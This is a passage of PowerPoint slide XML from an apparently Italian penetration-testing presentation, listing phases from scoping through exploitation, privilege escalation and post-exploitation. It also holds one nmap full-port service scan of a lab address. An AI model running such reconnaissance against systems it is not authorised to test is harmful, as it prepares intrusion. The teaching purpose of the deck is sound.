              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> -p- 10.0.2.5 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> scan.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/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FF4F11A-D018-F8AB-F08F-118973FD8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90" y="5043138"/>
            <a:ext cx="9673389" cy="1045772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396074707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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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Individuazione dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating</a:t>
            </a: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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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94708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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253" y="3859506"/>
            <a:ext cx="2611973" cy="230096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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
